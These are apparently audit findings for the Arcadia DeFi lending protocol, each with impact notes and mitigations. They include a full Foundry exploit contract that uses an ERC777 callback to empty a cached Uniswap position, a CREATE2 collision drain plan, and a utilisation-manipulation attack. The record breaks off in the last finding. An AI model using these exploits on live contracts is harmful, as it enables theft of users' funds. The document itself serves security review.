```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of "price" in "Numeraire" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a "transferFrom" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n
Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positions
high
It is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.\\nWhen depositing into an account, the `deposit()` function is called, which calls the internal `_deposit()` function. Depositing is performed in two steps:\\nThe registry's `batchProcessDeposit()` function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.\\nThe assets are transferred and deposited into the account.\\n```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n\\nFor Uniswap positions (and assuming that a creditor is set), calling `batchProcessDeposit()` will internally trigger the UniswapV3AM.processDirectDeposit():\\n```\\n// UniswapV3AM.sol\\n\\nfunction processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)\\n public\\n override\\n returns (uint256 recursiveCalls, uint256 assetType)\\n {\\n // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).\\n // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.\\n if (amount == 1) _addAsset(assetId);\\n\\n // rest of code\\n }\\n```\\n\\nThe Uniswap position will then be added to the protocol using the internal `_addAsset()` function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:\\n```\\nfunction _addAsset(uint256 assetId) internal {\\n // rest of code\\n\\n (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n\\n // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the\\n // deposit functions and there any deposit of non-allowed Underlying Assets will revert.\\n if (liquidity == 0) revert ZeroLiquidity();\\n\\n // The liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner,\\n // the max exposure checks could otherwise be circumvented.\\n assetToLiquidity[assetId] = liquidity;\\n\\n // rest of code\\n }\\n```\\n\\nAs the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e the amount that the position is worth) will be computed utilizing the `_getPosition()` internal function, which will read the cached liquidity value stored in the `assetToLiquidity[assetId]` mapping, rather than directly consulting the NonFungibleManager contract. This way, the position won't be able to surpass the max exposures:\\n```\\n// UniswapV3AM.sol\\n\\nfunction _getPosition(uint256 assetId)\\n internal\\n view\\n returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)\\n {\\n // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.\\n liquidity = uint128(assetToLiquidity[assetId]);\\n\\n if (liquidity > 0) {\\n (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n } else {\\n // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.\\n (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n }\\n }\\n```\\n\\nHowever, storing the liquidity leads to an attack vector that allows Uniswap positions' liquidity to be comlpetely withdrawn while making the protocol believe that the Uniswap position is still full.\\nAs mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position's liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.\\nThe following steps show how the attack could be performed:\\nInitially, a malicious contract must be created. This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777's `tokensToSend()` hook.\\nThe malicious contract will call the account's `deposit()` function with two `assetAddresses` to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.\\n`IRegistry(registry).batchProcessDeposit()` will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the `assetToLiquidity[assetId]` mapping.\\nAfter processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the `tokensToSend()` hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won't be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the `batchProcessDeposit()` step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.\\nFinally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.\\nProof of Concept\\nThis proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nNext step is to replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nCreate a `PocUniswap.t.sol` file in `lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol` and paste the following code snippet into it:\\n`/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";\\n\\nimport { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";\\nimport { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from "../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol";\\nimport { ERC20Mock } from "../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol";\\n\\nimport "forge-std/console.sol";\\n\\ninterface IERC721 {\\n function ownerOf(uint256 tokenid) external returns(address);\\n function approve(address spender, uint256 tokenId) external;\\n}\\n \\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { \\n\\n /////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n /////////////////////////////////////////////////////////////////\\n int24 private MIN_TICK = -887_272;\\n int24 private MAX_TICK = -MIN_TICK;\\n\\n /////////////////////////////////////////////////////////////////\\n // STORAGE //\\n /////////////////////////////////////////////////////////////////\\n AccountOwner public accountOwnerContract;\\n ERC20Mock token0;\\n ERC20Mock token1;\\n uint256 tokenId;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy fixture for Uniswap.\\n UniswapV3Fixture.setUp();\\n\\n deployUniswapV3AM(address(nonfungiblePositionManager));\\n\\n vm.startPrank(users.riskManager);\\n registryExtension.setRiskParametersOfDerivedAM(\\n address(pool), address(uniV3AssetModule), type(uint112).max, 100\\n );\\n \\n token0 = mockERC20.token1;\\n token1 = mockERC20.token2;\\n (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);\\n\\n // Deploy account owner\\n accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));\\n\\n \\n // Set origination fee\\n vm.startPrank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer ownership to Account Owner \\n vm.startPrank(users.accountOwner);\\n factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));\\n vm.stopPrank();\\n \\n\\n // Mint uniswap position underlying tokens to accountOwnerContract\\n mockERC20.token1.mint(address(accountOwnerContract), 100 ether);\\n mockERC20.token2.mint(address(accountOwnerContract), 100 ether);\\n\\n // Open Uniswap position \\n tokenId = _openUniswapPosition();\\n \\n\\n // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n function testVuln_borrowUsingUndercollateralizedUniswapPosition(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open margin account setting pool as new creditor\\n vm.startPrank(address(accountOwnerContract));\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit assets into account. The order of the assets to be deposited is important. The first asset will be an ERC777 token that triggers the callback on transferring.\\n // The second asset will be the uniswap position.\\n\\n address[] memory assetAddresses = new address[](2);\\n assetAddresses[0] = address(mockERC20.token777);\\n assetAddresses[1] = address(nonfungiblePositionManager);\\n uint256[] memory assetIds = new uint256[](2);\\n assetIds[0] = 0;\\n assetIds[1] = tokenId;\\n uint256[] memory assetAmounts = new uint256[](2);\\n assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback\\n assetAmounts[1] = 1;\\n // Set approvals\\n IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);\\n mockERC20.token777.approve(address(proxyAccount), type(uint256).max);\\n\\n // Perform deposit. \\n // Deposit will perform two steps:\\n // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position\\n // will be stored in the `assetToLiquidity` mapping.\\n // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. \\n // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap \\n // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality\\n // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. \\n proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);\\n\\n //---------- FINAL ASSERTIONS ----------//\\n // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. This does not reflect that the position is empty,\\n // hence it is possible to borrow with an empty uniswap position.\\n uint256 finalCollateralValue = proxyAccount.getCollateralValue();\\n\\n // Liquidity in the position is 0.\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(tokenId); \\n\\n console.log("Collateral value of account:", finalCollateralValue);\\n console.log("Actual liquidity in position", liquidity);\\n\\n assertEq(liquidity, 0);\\n assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000\\n } \\n\\n function _openUniswapPosition() internal returns(uint256 tokenId) {\\n vm.startPrank(address(accountOwnerContract));\\n \\n uint160 sqrtPriceX96 = uint160(\\n calculateAndValidateRangeTickCurrent(\\n 10 * 10**18, // priceToken0\\n 20 * 10**18 // priceToken1\\n )\\n );\\n\\n // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.\\n IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);\\n\\n // Approve liquidity\\n mockERC20.token1.approve(address(uniswapPool), type(uint256).max);\\n mockERC20.token2.approve(address(uniswapPool), type(uint256).max);\\n\\n // Mint liquidity position.\\n uint128 liquidity = 100 * 10**18;\\n tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);\\n \\n assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));\\n }\\n \\n}\\n\\n/// @notice ERC777Sender interface\\ninterface IERC777Sender {\\n /**\\n * @dev Called by an {IERC777} token contract whenever a registered holder's\\n * (`from`) tokens are about to be moved or destroyed. The type of operation\\n * is conveyed by `to` being the zero address or not.\\n *\\n * This call occurs _before_ the token contract's state is updated, so\\n * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.\\n *\\n * This function may revert to prevent the operation from being executed.\\n */\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\ninterface INonfungiblePositionManager {\\n function positions(uint256 tokenId)\\n external\\n view\\n returns (\\n uint96 nonce,\\n address operator,\\n address token0,\\n address token1,\\n uint24 fee,\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n uint256 feeGrowthInside0LastX128,\\n uint256 feeGrowthInside1LastX128,\\n uint128 tokensOwed0,\\n uint128 tokensOwed1\\n );\\n\\n struct DecreaseLiquidityParams {\\n uint256 tokenId;\\n uint128 liquidity;\\n uint256 amount0Min;\\n uint256 amount1Min;\\n uint256 deadline;\\n }\\n function decreaseLiquidity(DecreaseLiquidityParams calldata params)\\n external\\n payable\\n returns (uint256 amount0, uint256 amount1);\\n}\\n\\n /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback\\ncontract AccountOwner is IERC777Sender {\\n\\n INonfungiblePositionManager public nonfungiblePositionManager;\\n\\n constructor(address _nonfungiblePositionManager) {\\n nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);\\n }\\n\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Remove liquidity from Uniswap position\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(1); // tokenId 1\\n\\n INonfungiblePositionManager.DecreaseLiquidityParams memory params = INonfungiblePositionManager.DecreaseLiquidityParams({\\n tokenId: 1,\\n liquidity: liquidity,\\n amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n });\\n nonfungiblePositionManager.decreaseLiquidity(params);\\n }\\n \\n\\n function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {\\n return bytes4(abi.encodeWithSignature("onERC721Received(address,address,uint256,bytes)"));\\n }\\n\\n}`\\nExecute the following command being inside the `lending-v2` folder: `forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv`.\\nNOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry's `vm.getCode()` and we are importing the deployment file from the `accounts-v2` repo to the `lending-v2` repo, which makes foundry throw some errors. To fix this, just compile the contracts in the `accounts-v2` repo and copy the missing folders from the `accounts-v2/out` generated folder into the `lending-v2/out` folder.
There are several ways to mitigate this issue. One possible option is to perform the transfer of assets when depositing at the same time that the asset is processed, instead of first processing the assets (and storing the Uniswap liquidity) and then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping and the one returned by the NonFungiblePositionManager are the same.
High. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.
```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n
Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`
medium
Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time `deposit()` is called but StakedStargateAM does not take it into account.\\nWhen either mint() or increaseLiquidity() are called the `assetState[asset].lastRewardGlobal` variable is not reset to `0` even though the rewards have been transferred and accounted for on stargate side.\\nAfter a call to mint() or increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because `assetState_.lastRewardGlobal` has not been correctly reset to `0` but `currentRewardGlobal` (which is fetched from stargate) has:\\n```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n\\n```\\nfunction _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {\\n currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));\\n}\\n```\\n\\nPOC\\nTo copy-paste in USDbCPool.fork.t.sol:\\n```\\nfunction testFork_WrongRewards() public {\\n uint256 initBalance = 1000 * 10 ** USDbC.decimals();\\n // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.\\n vm.startPrank(users.accountOwner);\\n deal(address(USDbC), users.accountOwner, initBalance);\\n\\n USDbC.approve(address(router), initBalance);\\n router.addLiquidity(poolId, initBalance, users.accountOwner);\\n // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);\\n\\n // And : The user stakes the LP token via the StargateAssetModule\\n uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);\\n ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);\\n uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);\\n\\n //We let 10 days pass to accumulate rewards.\\n vm.warp(block.timestamp + 10 days);\\n\\n // User increases liquidity of the position.\\n uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.increaseLiquidity(tokenId, 1);\\n\\n vm.expectRevert();\\n stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow\\n\\n //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed\\n vm.warp(block.timestamp + 10 days);\\n uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.burn(tokenId);\\n\\n assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.\\n vm.stopPrank();\\n}\\n```\\n
Adjust the `assetState[asset].lastRewardGlobal` correctly or since every action (mint(), `burn()`, `increaseLiquidity()`, `decreaseliquidity()`, claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the `deltaReward` directly:\\n```\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n```\\n
Users will not be able to take any action on their positions until `currentRewardGlobal` is greater or equal to `assetState_.lastRewardGlobal`. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of `assetState_.lastRewardGlobal` rewards is nullified.\\nThis will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.
```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n
`CREATE2` address collision against an Account will allow complete draining of lending pools
medium
The factory function `createAccount()` creates a new account contract for the user using `CREATE2`. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. Furthermore, such an attack allows draining of all funds from the lending pool.\\nThe attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:\\nPoC: Finding a collision\\nNote that in `createAccount`, `CREATE2` salt is user-supplied, and `tx.origin` is technically also user-supplied:\\n```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n\\nThe address collision an attacker will need to find are:\\nOne undeployed Arcadia account address (1).\\nArbitrary attacker-controlled wallet contract (2).\\nBoth sets of addresses can be brute-force searched because:\\nAs shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we have obtained many different (undeployed) wallet accounts for (1).\\n(2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.\\nAn attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:\\nBrute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.\\nBrute-force contract pre-computation to find a collision with any address within the stored set in step 1.\\nThe feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:\\n1: A past issue on Sherlock describing this attack.\\n2: EIP-3607, which rationale is this exact attack. The EIP is in final state.\\n3: A blog post discussing the cost (money and time) of this exact attack.\\nThe hashrate of the BTC network has reached $6 \\times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.\\nPoC: Draining the lending pool\\nEven given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.\\nAssuming the attacker has already found an address collision against an undeployed account, let's say `0xCOLLIDED`. The steps for complete draining of a lending pool are as follow:\\nFirst tx:\\nDeploy the attack contract onto address `0xCOLLIDED`.\\nSet infinite allowance for {0xCOLLIDED ---> attacker wallet} for any token they want.\\nDestroy the contract using `selfdestruct`.\\nPost Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.\\nThe attacker now has complete control of any funds sent to `0xCOLLIDED`.\\nSecond tx:\\nDeploy an account to `0xCOLLIDED`.\\nDeposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.\\nRepeat step 2 for as long as they need to (i.e. collateralize the same asset multiple times).\\nThe account at `0xCOLLIDED` is now infinitely collateralized.\\nFunds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.\\nAn infinitely collateralized account has infinite borrow power. Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.\\nThe attacker has stolen all funds from the lending pool.\\nCoded unit-PoC\\nWhile we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:\\nA contract can be deployed on top of an address that already had a contract before.\\nBy deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.\\nHere is the PoC, as well as detailed steps to recreate it:\\nThe provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.
The mitigation method is to prevent controlling over the deployed account address (or at least severely limit that). Some techniques may be:\\nDo not allow a user-supplied `salt`, as well as do not use the user address as a determining factor for the `salt`.\\nUse the vanilla contract creation with `CREATE`, as opposed to `CREATE2`. The contract's address is determined by `msg.sender` (the factory), and the internal `nonce` of the factory (for a contract, this is just "how many other contracts it has deployed" plus one).\\nThis will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.
Complete draining of a lending pool if an address collision is found.\\nWith the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and that the current Bitcoin network hashrate allows about $2^{80}$ in about half an hour. The cost of the attack may be offsetted with longer brute force time.\\nFor a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.
```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n
Utilisation Can Be Manipulated Far Above 100%
medium
The utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.\\nThe utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:\\nNormally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the `transfer` of tokens will revert due to not enough tokens in the `Lending pool`. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nThese are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.\\nIn the utilisation calculation, this results in a incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.\\nThe interest rate is so high that over 2 minutes, 100 assets grows to over100000 assets, or a 100000% interest over 2 minutes. The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.\\nNote that the 1e18 assets "donated" to the protocol are not lost. They can simply be all borrowed into an attackers account.\\nThe attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit\\nLet me sum up the attack in the POC:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nVictim deposits into tranche\\nAttacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited\\nHere is the output from the console.logs:\\n```\\nRunning 1 test for 